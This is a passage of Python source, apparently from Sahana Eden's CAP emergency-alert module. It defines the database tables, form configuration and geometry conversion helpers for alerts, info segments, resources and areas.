Field("identifier", unique=True, length=128,
default = self.generate_identifier,
label = T("Identifier"),
),
Field("sender",
label = T("Sender"),
default = self.generate_sender,
# @todo: can not be empty in alerts (validator!)
),
s3_datetime("sent",
default = "now",
writable = False,
),
Field("status",
default = "Draft",
label = T("Status"),
requires = IS_IN_SET(cap_alert_status_code_opts),
),
Field("msg_type",
label = T("Message Type"),
requires = IS_EMPTY_OR(
IS_IN_SET(cap_alert_msgType_code_opts)
),
),
Field("source",
label = T("Source"),
),
Field("scope",
label = T("Scope"),
requires = IS_EMPTY_OR(
IS_IN_SET(cap_alert_scope_code_opts)
),
),
# Text describing the restriction for scope=restricted
Field("restriction", "text",
label = T("Restriction"),
),
Field("addresses", "list:string",
label = T("Recipients"),
represent = self.list_string_represent,
#@ToDo: provide a better way to add multiple addresses,
# do not ask the user to delimit it themselves
# this should eventually use the CAP contacts
#widget = S3CAPAddressesWidget,
),
Field("codes", "text",
default = settings.get_cap_codes(),
label = T("Codes"),
represent = S3KeyValueWidget.represent,
widget = S3KeyValueWidget(),
),
Field("note", "text",
label = T("Note"),
),
Field("reference", "list:reference cap_alert",
label = T("Reference"),
represent = S3Represent(lookup = tablename,
fields = ["msg_type", "sent", "sender"],
field_sep = " - ",
multiple = True,
),
# @ToDo: This should not be manually entered,
# needs a widget
#widget = S3ReferenceWidget(table,
# one_to_many=True,
# allow_create=False),
),
# @ToDo: Switch to using event_incident_type_id
Field("incidents", "list:string",
label = T("Incidents"),
represent = S3Represent(options = cap_incident_type_opts,
multiple = True),
requires = IS_EMPTY_OR(
IS_IN_SET(cap_incident_type_opts,
multiple = True,
sort = True,
)),
widget = S3MultiSelectWidget(),
),
*s3_meta_fields())
filter_widgets = [
S3TextFilter(["identifier",
"sender",
"incidents",
"cap_info.headline",
"cap_info.event",
],
label = T("Search"),
comment = T("Search for an Alert by sender, incident, headline or event."),
),
S3OptionsFilter("info.category",
label = T("Category"),
options = cap_info_category_opts,
),
S3LocationFilter("location.location_id",
label = T("Location(s)"),
# options = gis.get_countries().keys(),
),
S3OptionsFilter("info.language",
label = T("Language"),
),
]
configure(tablename,
context = {"location": "location.location_id",
},
filter_widgets = filter_widgets,
onvalidation = self.cap_alert_form_validation,
)
# Components
add_components(tablename,
cap_area = "alert_id",
cap_area_location = {"name": "location",
"joinby": "alert_id",
},
cap_info = "alert_id",
cap_resource = "alert_id",
)
self.set_method("cap", "alert",
method = "import_feed",
action = CAPImportFeed())
if crud_strings["cap_template"]:
crud_strings[tablename] = crud_strings["cap_template"]
else:
ADD_ALERT = T("Create Alert")
crud_strings[tablename] = Storage(
label_create = ADD_ALERT,
title_display = T("Alert Details"),
title_list = T("Alerts"),
# If already-published, this should create a new "Update"
# alert instead of modifying the original
title_update = T("Edit Alert"),
title_upload = T("Import Alerts"),
label_list_button = T("List Alerts"),
label_delete_button = T("Delete Alert"),
msg_record_created = T("Alert created"),
msg_record_modified = T("Alert modified"),
msg_record_deleted = T("Alert deleted"),
msg_list_empty = T("No alerts to show"))
alert_represent = S3Represent(lookup = tablename,
fields = ["msg_type", "sent", "sender"],
field_sep = " - ")
alert_id = S3ReusableField("alert_id", "reference %s" % tablename,
comment = T("The alert message containing this information"),
label = T("Alert"),
ondelete = "CASCADE",
represent = alert_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "cap_alert.id",
alert_represent)),
)
# ---------------------------------------------------------------------
# CAP info segments
#
cap_info_responseType_opts = OrderedDict([
("Shelter", T("Shelter - Take shelter in place or per instruction")),
("Evacuate", T("Evacuate - Relocate as instructed in the instruction")),
("Prepare", T("Prepare - Make preparations per the instruction")),
("Execute", T("Execute - Execute a pre-planned activity identified in instruction")),
("Avoid", T("Avoid - Avoid the subject event as per the instruction")),
("Monitor", T("Monitor - Attend to information sources as described in instruction")),
("Assess", T("Assess - Evaluate the information in this message.")),
("AllClear", T("AllClear - The subject event no longer poses a threat")),
("None", T("None - No action recommended")),
])
cap_info_urgency_opts = OrderedDict([
("Immediate", T("Response action should be taken immediately")),
("Expected", T("Response action should be taken soon (within next hour)")),
("Future", T("Responsive action should be taken in the near future")),
("Past", T("Responsive action is no longer required")),
("Unknown", T("Unknown")),
])
cap_info_severity_opts = OrderedDict([
("Extreme", T("Extraordinary threat to life or property")),
("Severe", T("Significant threat to life or property")),
("Moderate", T("Possible threat to life or property")),
("Minor", T("Minimal to no known threat to life or property")),
("Unknown", T("Severity unknown")),
])
cap_info_certainty_opts = OrderedDict([
("Observed", T("Observed: determined to have occurred or to be ongoing")),
("Likely", T("Likely (p > ~50%)")),
("Possible", T("Possible but not likely (p <= ~50%)")),
("Unlikely", T("Not expected to occur (p ~ 0)")),
("Unknown", T("Certainty unknown")),
])
# CAP info priority
priorities = settings.get_cap_priorities()
try:
cap_info_priority_opts = OrderedDict([(f[0], f[1]) for f in priorities]
+ [("Undefined", T("Undefined"))])
except IndexError:
raise ValueError("CAP priorities setting is not structured properly")
# @ToDo: i18n: Need label=T("")
tablename = "cap_info"
define_table(tablename,
alert_id(),
Field("is_template", "boolean",
default = False,
readable = False,
writable = False,
),
Field("template_info_id", "reference cap_info",
ondelete = "RESTRICT",
readable = False,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "cap_info.id",
self.template_represent,
filterby="is_template",
filter_opts=(True,)
)),
widget = S3HiddenWidget(),
),
Field("template_settings", "text",
readable = False,
),
Field("language",
default = "en",
requires = IS_EMPTY_OR(
IS_IN_SET(settings.get_cap_languages())
),
),
Field("category", "list:string",
represent = S3Represent(options = cap_info_category_opts,
multiple = True,
),
required = True,
requires = IS_IN_SET(cap_info_category_opts,
multiple = True,
),
widget = S3MultiSelectWidget(),
), # 1 or more allowed
Field("event",
required = True,
),
Field("response_type", "list:string",
represent = S3Represent(options = cap_info_responseType_opts,
multiple = True,
),
requires = IS_IN_SET(cap_info_responseType_opts,
multiple = True),
widget = S3MultiSelectWidget(),
), # 0 or more allowed
Field("priority",
requires = IS_EMPTY_OR(
IS_IN_SET(cap_info_priority_opts)
),
),
Field("urgency",
required = True,
requires = IS_IN_SET(cap_info_urgency_opts),
),
Field("severity",
required = True,
requires = IS_IN_SET(cap_info_severity_opts),
),
Field("certainty",
required = True,
requires = IS_IN_SET(cap_info_certainty_opts),
),
Field("audience", "text"),
Field("event_code", "text",
default = settings.get_cap_event_codes(),
represent = S3KeyValueWidget.represent,
widget = S3KeyValueWidget(),
),
s3_datetime("effective"),
s3_datetime("onset"),
s3_datetime("expires",
past = 0,
),
Field("sender_name"),
Field("headline"),
Field("description", "text"),
Field("instruction", "text"),
Field("contact", "text"),
Field("web",
requires = IS_EMPTY_OR(IS_URL()),
),
Field("parameter", "text",
default = settings.get_cap_parameters(),
label = T("Parameters"),
represent = S3KeyValueWidget.represent,
widget = S3KeyValueWidget(),
),
*s3_meta_fields())
info_labels = cap_info_labels()
for field in info_labels:
db.cap_info[field].label = info_labels[field]
if crud_strings["cap_template_info"]:
crud_strings[tablename] = crud_strings["cap_template_info"]
else:
ADD_INFO = T("Add alert information")
crud_strings[tablename] = Storage(
label_create = ADD_INFO,
title_display = T("Alert information"),
title_list = T("Information entries"),
title_update = T("Update alert information"), # this will create a new "Update" alert?
title_upload = T("Import alert information"),
subtitle_list = T("Listing of alert information items"),
label_list_button = T("List information entries"),
label_delete_button = T("Delete Information"),
msg_record_created = T("Alert information created"),
msg_record_modified = T("Alert information modified"),
msg_record_deleted = T("Alert information deleted"),
msg_list_empty = T("No alert information to show"))
info_represent = S3Represent(lookup = tablename,
fields = ["language", "headline"],
field_sep = " - ")
info_id = S3ReusableField("info_id", "reference %s" % tablename,
label = T("Information Segment"),
ondelete = "CASCADE",
represent = info_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "cap_info.id",
info_represent)
),
sortby = "identifier",
)
configure(tablename,
#create_next = URL(f="info", args=["[id]", "area"]),
onaccept = self.info_onaccept,
)
# Components
add_components(tablename,
cap_resource = "info_id",
cap_area = "info_id",
)
# ---------------------------------------------------------------------
# CAP Resource segments
#
# Resource elements sit inside the Info segment of the export XML
# - however in most cases these would be common across all Infos, so in
# our internal UI we link these primarily to the Alert but still
# allow the option to differentiate by Info
#
tablename = "cap_resource"
define_table(tablename,
alert_id(writable = False,
),
info_id(),
self.super_link("doc_id", "doc_entity"),
Field("resource_desc",
requires = IS_NOT_EMPTY(),
),
Field("mime_type",
requires = IS_NOT_EMPTY(),
),
Field("size", "integer",
writable = False,
),
Field("uri",
# needs a special validation
writable = False,
),
#Field("file", "upload"),
Field("deref_uri", "text",
readable = False,
writable = False,
),
Field("digest",
writable = False,
),
*s3_meta_fields())
# CRUD Strings
crud_strings[tablename] = Storage(
label_create = T("Add Resource"),
title_display = T("Alert Resource"),
title_list = T("Resources"),
title_update = T("Edit Resource"),
subtitle_list = T("List Resources"),
label_list_button = T("List Resources"),
label_delete_button = T("Delete Resource"),
msg_record_created = T("Resource added"),
msg_record_modified = T("Resource updated"),
msg_record_deleted = T("Resource deleted"),
msg_list_empty = T("No resources currently defined for this alert"))
# @todo: complete custom form
crud_form = S3SQLCustomForm(#"name",
"info_id",
"resource_desc",
S3SQLInlineComponent("image",
label=T("Image"),
fields=["file",
],
),
S3SQLInlineComponent("document",
label=T("Document"),
fields=["file",
],
),
)
configure(tablename,
super_entity = "doc_entity",
crud_form = crud_form,
# Shouldn't be required if all UI actions go through alert controller & XSLT configured appropriately
create_onaccept = update_alert_id(tablename),
)
# ---------------------------------------------------------------------
# CAP Area segments
#
# Area elements sit inside the Info segment of the export XML
# - however in most cases these would be common across all Infos, so in
# our internal UI we link these primarily to the Alert but still
# allow the option to differentiate by Info
#
# Each <area> can have multiple elements which are one of <polygon>,
# <circle>, or <geocode>.
# <polygon> and <circle> are explicit geometry elements.
# <geocode> is a key-value pair in which the key is a standard
# geocoding system like SAME, FIPS, ZIP, and the value is a defined
# value in that system. The region described by the <area> is the
# union of the areas described by the individual elements, but the
# CAP spec advises that, if geocodes are included, the concrete
# geometry elements should outline the area specified by the geocodes,
# as not all recipients will have access to the meanings of the
# geocodes. However, since geocodes are a compact way to describe an
# area, it may be that they will be used without accompanying geometry,
# so we should not count on having <polygon> or <circle>.
#
# Geometry elements are each represented by a gis_location record, and
# linked to the cap_area record via the cap_area_location link table.
# For the moment, <circle> objects are stored with the center in the
# gis_location's lat, lon, and radius (in km) as a tag "radius" and
# value. ToDo: Later, we will add CIRCLESTRING WKT.
#
# Geocode elements are currently stored as key value pairs in the
# cap_area record.
#
# <area> can also specify a minimum altitude and maximum altitude
# ("ceiling"). These are stored in explicit fields for now, but could
# be replaced by key value pairs, if it is found that they are rarely
# used.
#
# (An alternative would be to have cap_area link to a gis_location_group
# record. In that case, the geocode tags could be stored in the
# gis_location_group's overall gis_location element's tags. The altitude
# could be stored in the overall gis_location's elevation, with ceiling
# stored in a tag. We could consider adding a maximum elevation field.)
tablename = "cap_area"
define_table(tablename,
alert_id(writable = False,
),
info_id(),
Field("name",
label = T("Area description"),
required = True,
),
Field("altitude", "integer"), # Feet above Sea-level in WGS84 (Specific or Minimum is using a range)
Field("ceiling", "integer"), # Feet above Sea-level in WGS84 (Maximum)
*s3_meta_fields())
# CRUD Strings
crud_strings[tablename] = Storage(
label_create = T("Add Area"),
title_display = T("Alert Area"),
title_list = T("Areas"),
title_update = T("Edit Area"),
subtitle_list = T("List Areas"),
label_list_button = T("List Areas"),
label_delete_button = T("Delete Area"),
msg_record_created = T("Area added"),
msg_record_modified = T("Area updated"),
msg_record_deleted = T("Area deleted"),
msg_list_empty = T("No areas currently defined for this alert"))
crud_form = S3SQLCustomForm("name",
"info_id",
# Not yet working with default formstyle or multiple=True
#S3SQLInlineComponent("location",
# name = "location",
# label = "",
# multiple = False,
# fields = [("", "location_id")],
# ),
S3SQLInlineComponent("tag",
name = "tag",
label = "",
fields = ["tag",
"value",
],
),
"altitude",
"ceiling",
)
area_represent = S3Represent(lookup=tablename)
configure(tablename,
#create_next = URL(f="area", args=["[id]", "location"]),
# Shouldn't be required if all UI actions go through alert controller & XSLT configured appropriately
create_onaccept = update_alert_id(tablename),
crud_form = crud_form,
)
# Components
add_components(tablename,
cap_area_location = {"name": "location",
"joinby": "area_id",
},
cap_area_tag = {"name": "tag",
"joinby": "area_id",
},
)
area_id = S3ReusableField("area_id", "reference %s" % tablename,
label = T("Area"),
ondelete = "CASCADE",
represent = area_represent,
requires = IS_ONE_OF(db, "cap_area.id",
area_represent),
)
# ToDo: Use a widget tailored to entering <polygon> and <circle>.
# Want to be able to enter them by drawing on the map.
# Also want to allow selecting existing locations that have
# geometry, maybe with some filtering so the list isn't cluttered
# with irrelevant locations.
tablename = "cap_area_location"
define_table(tablename,
alert_id(readable = False,
writable = False,
),
area_id(),
self.gis_location_id(
widget = S3LocationSelector(points = False,
polygons = True,
show_map = True,
show_address = False,
show_postcode = False,
),
),
)
# CRUD Strings
crud_strings[tablename] = Storage(
label_create = T("Add Location"),
title_display = T("Alert Location"),
title_list = T("Locations"),
title_update = T("Edit Location"),
subtitle_list = T("List Locations"),
label_list_button = T("List Locations"),
label_delete_button = T("Delete Location"),
msg_record_created = T("Location added"),
msg_record_modified = T("Location updated"),
msg_record_deleted = T("Location deleted"),
msg_list_empty = T("No locations currently defined for this alert"))
configure(tablename,
# Shouldn't be required if all UI actions go through alert controller & XSLT configured appropriately
create_onaccept = update_alert_id(tablename),
)
# ---------------------------------------------------------------------
# Area Tags
# - Key-Value extensions
# - Used to hold for geocodes: key is the geocode system name, and
# value is the specific value for this area.
# - Could store other values here as well, to avoid dedicated fields
# in cap_area for rarely-used items like altitude and ceiling, but
# would have to distinguish those from geocodes.
#
# ToDo: Provide a mechanism for pre-loading geocodes that are not tied
# to individual areas.
# ToDo: Allow sharing the key-value pairs. Cf. Ruby on Rails tagging
# systems such as acts-as-taggable-on, which has a single table of tags
# used by all classes. Each tag record has the class and field that the
# tag belongs to, as well as the tag string. We'd want tag and value,
# but the idea is the same: There would be a table with tag / value
# pairs, and individual cap_area, event_event, org_whatever records
# would link to records in the tag table. So we actually would not have
# duplicate tag value records as we do now.
tablename = "cap_area_tag"
define_table(tablename,
area_id(),
# ToDo: Allow selecting from a dropdown list of pre-defined
# geocode system names.
Field("tag",
label = T("Geocode Name"),
),
# ToDo: Once the geocode system is selected, fetch a list
# of current values for that geocode system. Allow adding
# new values, e.g. with combo box menu.
Field("value",
label = T("Value"),
),
s3_comments(),
*s3_meta_fields())
#configure(tablename,
# deduplicate = self.cap_area_tag_deduplicate,
# )
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
return dict(cap_alert_id = alert_id,
cap_alert_represent = alert_represent,
cap_area_represent = area_represent,
cap_info_represent = info_represent,
cap_info_category_opts = cap_info_category_opts
)
# -------------------------------------------------------------------------
@staticmethod
def generate_identifier():
"""
Generate an identifier for a new form
"""
db = current.db
table = db.cap_alert
r = db().select(table.id,
limitby=(0, 1),
orderby=~table.id).first()
_time = datetime.datetime.strftime(datetime.datetime.utcnow(), "%Y/%m/%dT%H:%M:%S")
if r:
next_id = int(r.id) + 1
else:
next_id = 1
# Format: prefix-time+-timezone+sequence-suffix
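        # e.g. with prefix "sahana.example.org", no suffix and next_id 42 (illustrative):
        #   "sahana.example.org-2014/06/10T12:00:00-42"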
settings = current.deployment_settings
prefix = settings.get_cap_identifier_prefix() or current.xml.domain
suffix = settings.get_cap_identifier_suffix()
return "%s-%s-%d%s%s" % \
(prefix, _time, next_id, ["", "-"][bool(suffix)], suffix)
# -------------------------------------------------------------------------
@staticmethod
def generate_sender():
"""
Generate a sender for a new form
"""
try:
user_id = current.auth.user.id
except AttributeError:
return ""
return "%s/%d" % (current.xml.domain, user_id)
# -------------------------------------------------------------------------
@staticmethod
def template_represent(id, row=None):
"""
Represent an alert template concisely
"""
if row:
id = row.id
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.cap_alert
row = db(table.id == id).select(table.is_template,
table.template_title,
# left = table.on(table.id == table.parent_item_category_id), Doesn't work
limitby=(0, 1)).first()
try:
# @ToDo: Should get headline from "info"?
if row.is_template:
return row.template_title
else:
                return current.s3db.cap_alert_represent(id)
except:
return current.messages.UNKNOWN_OPT
# -------------------------------------------------------------------------
@staticmethod
def list_string_represent(string, fmt=lambda v: v):
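        # web2py stores "list:string" values as a single pipe-delimited string,
        # e.g. "|Geo|Met|" (illustrative) -> "Geo, Met" via the second branch below.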
try:
if isinstance(string, list):
return ", ".join([fmt(i) for i in string])
elif isinstance(string, basestring):
return ", ".join([fmt(i) for i in string[1:-1].split("|")])
except IndexError:
return current.messages.UNKNOWN_OPT
return ""
# -------------------------------------------------------------------------
@staticmethod
def cap_alert_form_validation(form):
"""
On Validation for CAP alert form
"""
form_vars = form.vars
if form_vars.get("scope") == "Private" and not form_vars.get("addresses"):
form.errors["addresses"] = \
current.T("'Recipients' field mandatory in case of 'Private' scope")
return
# -------------------------------------------------------------------------
@staticmethod
def info_onaccept(form):
"""
After DB I/O
"""
if "vars" in form:
form_vars = form.vars
elif "id" in form:
form_vars = form
elif hasattr(form, "vars"):
form_vars = form.vars
else:
form_vars = form
info_id = form_vars.id
if not info_id:
return
db = current.db
atable = db.cap_alert
itable = db.cap_info
info = db(itable.id == info_id).select(itable.alert_id,
limitby=(0, 1)).first()
if info:
alert_id = info.alert_id
if alert_id and cap_alert_is_template(alert_id):
info.update(is_template = True)
return True
# =============================================================================
def cap_info_labels():
"""
Labels for CAP info segments
"""
T = current.T
return dict(language=T("Language"),
category=T("Category"),
event=T("Event"),
response_type=T("Response type"),
urgency=T("Urgency"),
severity=T("Severity"),
certainty=T("Certainty"),
audience=T("Audience"),
event_code=T("Event code"),
effective=T("Effective"),
onset=T("Onset"),
expires=T("Expires at"),
sender_name=T("Sender's name"),
headline=T("Headline"),
description=T("Description"),
instruction=T("Instruction"),
web=T("URL"),
contact=T("Contact information"),
parameter=T("Parameters")
)
# =============================================================================
def cap_alert_is_template(alert_id):
"""
Tell whether an alert entry is a template
"""
if not alert_id:
return False
table = current.s3db.cap_alert
query = (table.id == alert_id)
r = current.db(query).select(table.is_template,
limitby=(0, 1)).first()
return r and r.is_template
# =============================================================================
def cap_rheader(r):
""" Resource Header for CAP module """
rheader = None
if r.representation == "html":
record = r.record
if record:
T = current.T
s3db = current.s3db
tablename = r.tablename
if tablename == "cap_alert":
record_id = record.id
table = s3db.cap_info
query = (table.alert_id == record_id)
row = current.db(query).select(table.id,
limitby=(0, 1)).first()
if record.is_template:
if not (row and row.id):
error = DIV(T("An alert needs to contain at least one info item."),
_class="error")
else:
error = ""
tabs = [(T("Template"), None),
(T("Information template"), "info"),
#(T("Area"), "area"),
#(T("Resource Files"), "resource"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
rheader = DIV(TABLE(TR(TH("%s: " % T("Template")),
TD(A(S3CAPModel.template_represent(record_id, record),
_href=URL(c="cap", f="template",
args=[record_id, "update"]))),
),
),
rheader_tabs,
error
)
else:
if not (row and row.id):
error = DIV(T("You need to create at least one alert information item in order to be able to broadcast this alert!"),
_class="error")
export_btn = ""
else:
error = ""
export_btn = A(DIV(_class="export_cap_large"),
_href=URL(c="cap", f="alert", args=["%s.cap" % record_id]),
_target="_blank",
)
table = s3db.cap_area
query = (table.alert_id == record_id)
row = current.db(query).select(table.id,
limitby=(0, 1)).first()
if row:
# We have an Area, so we can add Locations
location_tab = (T("Location"), "location")
else:
location_tab = ""
tabs = [(T("Alert Details"), None),
(T("Information"), "info"),
(T("Area"), "area"),
location_tab,
(T("Resource Files"), "resource"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
rheader = DIV(TABLE(TR(TH("%s: " % T("Alert")),
TD(A(s3db.cap_alert_represent(record_id, record),
_href=URL(c="cap", f="alert",
args=[record_id, "update"]))),
),
TR(export_btn)
),
rheader_tabs,
error
)
elif tablename == "cap_area":
# Shouldn't ever be called
tabs = [(T("Area"), None),
(T("Locations"), "location"),
#(T("Geocodes"), "tag"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
rheader = DIV(TABLE(TR(TH("%s: " % T("Alert")),
TD(A(s3db.cap_alert_represent(record.alert_id),
_href=URL(c="cap", f="alert",
args=[record.id, "update"])))
),
TR(TH("%s: " % T("Information")),
TD(A(s3db.cap_info_represent(record.info_id),
_href=URL(c="cap", f="info",
args=[record.info_id, "update"]))),
),
TR(TH("%s: " % T("Area")),
TD(A(s3db.cap_area_represent(record.id, record),
_href=URL(c="cap", f="area",
args=[record.id, "update"]))),
),
),
rheader_tabs
)
elif tablename == "cap_area_location":
# Shouldn't ever be called
# We need the rheader only for the link back to the area.
rheader = DIV(TABLE(TR(TH("%s: " % T("Area")),
TD(A(s3db.cap_area_represent(record.area_id),
_href=URL(c="cap", f="area",
args=[record.area_id, "update"]))),
),
))
elif tablename == "cap_info":
# Shouldn't ever be called
tabs = [(T("Information"), None),
(T("Resource Files"), "resource"),
]
if cap_alert_is_template(record.alert_id):
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
rheader = DIV(TABLE(TR(TH("%s: " % T("Template")),
TD(A(S3CAPModel.template_represent(record.alert_id),
_href=URL(c="cap", f="template",
args=[record.alert_id, "update"]))),
),
TR(TH("%s: " % T("Info template")),
TD(A(s3db.cap_info_represent(record.id, record),
_href=URL(c="cap", f="info",
args=[record.id, "update"]))),
)
),
rheader_tabs,
_class="cap_info_template_form"
)
current.response.s3.js_global.append('''i18n.cap_locked="%s"''' % T("Locked"))
else:
tabs.insert(1, (T("Areas"), "area"))
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
rheader = DIV(TABLE(TR(TH("%s: " % T("Alert")),
TD(A(s3db.cap_alert_represent(record.alert_id),
_href=URL(c="cap", f="alert",
args=[record.alert_id, "update"]))),
),
TR(TH("%s: " % T("Information")),
TD(A(s3db.cap_info_represent(record.id, record),
_href=URL(c="cap", f="info",
args=[record.id, "update"]))),
)
),
rheader_tabs
)
return rheader
# =============================================================================
def update_alert_id(tablename):
""" On-accept for area and resource records """
def func(form):
if "vars" in form:
form_vars = form.vars
elif "id" in form:
form_vars = form
elif hasattr(form, "vars"):
form_vars = form.vars
else:
form_vars = form
if form_vars.get("alert_id", None):
# Nothing to do
return
# Look up from the info/area
_id = form_vars.id
if not _id:
return
db = current.db
table = db[tablename]
if tablename == "cap_area_location":
area_id = form_vars.get("area_id", None)
if not area_id:
# Get the full record
item = db(table.id == _id).select(table.alert_id,
table.area_id,
limitby=(0, 1)).first()
try:
alert_id = item.alert_id
area_id = item.area_id
except:
# Nothing we can do
return
if alert_id:
# Nothing to do
return
atable = db.cap_area
area = db(atable.id == area_id).select(atable.alert_id,
limitby=(0, 1)).first()
try:
alert_id = area.alert_id
except:
# Nothing we can do
return
else:
info_id = form_vars.get("info_id", None)
if not info_id:
# Get the full record
item = db(table.id == _id).select(table.alert_id,
table.info_id,
limitby=(0, 1)).first()
try:
alert_id = item.alert_id
info_id = item.info_id
except:
# Nothing we can do
return
if alert_id:
# Nothing to do
return
itable = db.cap_info
info = db(itable.id == info_id).select(itable.alert_id,
limitby=(0, 1)).first()
try:
alert_id = info.alert_id
except:
# Nothing we can do
return
db(table.id == _id).update(alert_id = alert_id)
return func
# =============================================================================
def cap_gis_location_xml_post_parse(element, record):
"""
UNUSED - done in XSLT
Convert CAP polygon representation to WKT; extract circle lat lon.
Latitude and longitude in CAP are expressed as signed decimal values in
coordinate pairs:
latitude,longitude
The circle text consists of:
latitude,longitude radius
where the radius is in km.
Polygon text consists of a space separated sequence of at least 4
coordinate pairs where the first and last are the same.
lat1,lon1 lat2,lon2 lat3,lon3 ... lat1,lon1
"""
# @ToDo: Extract altitude and ceiling from the enclosing <area>, and
# compute an elevation value to apply to all enclosed gis_locations.
cap_polygons = element.xpath("cap_polygon")
if cap_polygons:
cap_polygon_text = cap_polygons[0].text
# CAP polygons and WKT have opposite separator conventions:
# CAP has spaces between coordinate pairs and within pairs the
# coordinates are separated by comma, and vice versa for WKT.
# Unfortunately, CAP and WKT (as we use it) also have opposite
# orders of lat and lon. CAP has lat lon, WKT has lon lat.
# Both close the polygon by repeating the first point.
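        # Worked example (illustrative coordinates):
        #   CAP polygon "38.47,-120.14 38.34,-119.95 38.21,-120.19 38.47,-120.14"
        #   becomes WKT "POLYGON ((-120.14 38.47, -119.95 38.34, -120.19 38.21, -120.14 38.47))"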
cap_points_text = cap_polygon_text.split()
cap_points = [cpoint.split(",") for cpoint in cap_points_text]
# @ToDo: Should we try interpreting all the points as decimal numbers,
# and failing validation if they're wrong?
wkt_points = ["%s %s" % (cpoint[1], cpoint[0]) for cpoint in cap_points]
wkt_polygon_text = "POLYGON ((%s))" % ", ".join(wkt_points)
record.wkt = wkt_polygon_text
return
cap_circle_values = element.xpath("resource[@name='gis_location_tag']/data[@field='tag' and text()='cap_circle']/../data[@field='value']")
if cap_circle_values:
cap_circle_text = cap_circle_values[0].text
coords, radius = cap_circle_text.split()
lat, lon = coords.split(",")
try:
# If any of these fail to interpret as numbers, the circle was
# badly formatted. For now, we don't try to fail validation,
# but just don't set the lat, lon.
lat = float(lat)
lon = float(lon)
radius = float(radius)
except ValueError:
return
record.lat = lat
record.lon = lon
# Add a bounding box for the given radius, if it is not zero.
if radius > 0.0:
bbox = current.gis.get_bounds_from_radius(lat, lon, radius)
record.lat_min = bbox["lat_min"]
record.lon_min = bbox["lon_min"]
record.lat_max = bbox["lat_max"]
record.lon_max = bbox["lon_max"]
# =============================================================================
def cap_gis_location_xml_post_render(element, record):
"""
UNUSED - done in XSLT
Convert Eden WKT polygon (and eventually circle) representation to
CAP format and provide them in the rendered s3xml.
Not all internal formats have a parallel in CAP, but an effort is made
    to provide a reasonable substitute:
Polygons are supported.
Circles that were read in from CAP (and thus carry the original CAP
circle data) are supported.
Multipolygons are currently rendered as their bounding box.
Points are rendered as zero radius circles.
Latitude and longitude in CAP are expressed as signed decimal values in
coordinate pairs:
latitude,longitude
The circle text consists of:
latitude,longitude radius
where the radius is in km.
Polygon text consists of a space separated sequence of at least 4
coordinate pairs where the first and last are the same.
lat1,lon1 lat2,lon2 lat3,lon3 ... lat1,lon1
"""
# @ToDo: Can we rely on gis_feature_type == 3 to tell if the location is a
# polygon, or is it better to look for POLYGON in the wkt? For now, check
# both.
# @ToDo: CAP does not support multipolygons. Do we want to extract their
# outer polygon if passed MULTIPOLYGON wkt? For now, these are exported
# with their bounding box as the polygon.
# @ToDo: What if a point (gis_feature_type == 1) that is not a CAP circle
# has a non-point bounding box? Should it be rendered as a polygon for
# the bounding box?
try:
from lxml import etree
except:
# This won't fail, since we're in the middle of processing xml.
return
SubElement = etree.SubElement
s3xml = current.xml
TAG = s3xml.TAG
RESOURCE = TAG["resource"]
DATA = TAG["data"]
ATTRIBUTE = s3xml.ATTRIBUTE
NAME = ATTRIBUTE["name"]
FIELD = ATTRIBUTE["field"]
VALUE = ATTRIBUTE["value"]
loc_tablename = "gis_location"
tag_tablename = "gis_location_tag"
tag_fieldname = "tag"
val_fieldname = "value"
polygon_tag = "cap_polygon"
circle_tag = "cap_circle"
fallback_polygon_tag = "cap_polygon_fallback"
fallback_circle_tag = "cap_circle_fallback"
def __cap_gis_location_add_polygon(element, cap_polygon_text, fallback=False):
"""
Helper for cap_gis_location_xml_post_render that adds the CAP polygon
data to the current element in a gis_location_tag element.
"""
# Make a gis_location_tag.
tag_resource = SubElement(element, RESOURCE)
tag_resource.set(NAME, tag_tablename)
tag_field = SubElement(tag_resource, DATA)
# Add tag and value children.
tag_field.set(FIELD, tag_fieldname)
if fallback:
tag_field.text = fallback_polygon_tag
else:
tag_field.text = polygon_tag
val_field = SubElement(tag_resource, DATA)
val_field.set(FIELD, val_fieldname)
val_field.text = cap_polygon_text
def __cap_gis_location_add_circle(element, lat, lon, radius, fallback=False):
"""
Helper for cap_gis_location_xml_post_render that adds CAP circle
data to the current element in a gis_location_tag element.
"""
# Make a gis_location_tag.
tag_resource = SubElement(element, RESOURCE)
tag_resource.set(NAME, tag_tablename)
tag_field = SubElement(tag_resource, DATA)
# Add tag and value children.
tag_field.set(FIELD, tag_fieldname)
if fallback:
tag_field.text = fallback_circle_tag
else:
tag_field.text = circle_tag
val_field = SubElement(tag_resource, DATA)
val_field.set(FIELD, val_fieldname)
# Construct a CAP circle string: latitude,longitude radius
cap_circle_text = "%s,%s %s" % (lat, lon, radius)
val_field.text = cap_circle_text
# Sort out the geometry case by wkt, CAP tags, gis_feature_type, bounds,...
# Check the two cases for CAP-specific locations first, as those will have
# definite export values. For others, we'll attempt to produce either a
# circle or polygon: Locations with a bounding box will get a box polygon,
# points will get a zero-radius circle.
# Currently wkt is stripped out of gis_location records right here:
# https://github.com/flavour/eden/blob/master/modules/s3/s3resource.py#L1332
# https://github.com/flavour/eden/blob/master/modules/s3/s3resource.py#L1426
# https://github.com/flavour/eden/blob/master/modules/s3/s3resource.py#L3152
# Until we provide a way to configure that choice, this will not work for
# polygons.
wkt = record.get("wkt", None)
# WKT POLYGON: Although there is no WKT spec, according to every reference
# that deals with nested polygons, the outer, enclosing, polygon must be
# listed first. Hence, we extract only the first polygon, as CAP has no
# provision for nesting.
if wkt and wkt.startswith("POLYGON"):
# ToDo: Is it sufficient to test for adjacent (( to find the start of
# the polygon, or might there be whitespace between them?
start = wkt.find("((")
end = wkt.find(")")
if start >=0 and end >=0:
polygon_text = wkt[start + 2 : end]
points_text = polygon_text.split(",")
points = [p.split() for p in points_text]
cap_points_text = ["%s,%s" % (point[1], point[0]) for point in points]
cap_polygon_text = " ".join(cap_points_text)
__cap_gis_location_add_polygon(element, cap_polygon_text)
return
# Fall through if the wkt string was mal-formed.
# CAP circle stored in a gis_location_tag with tag = cap_circle.
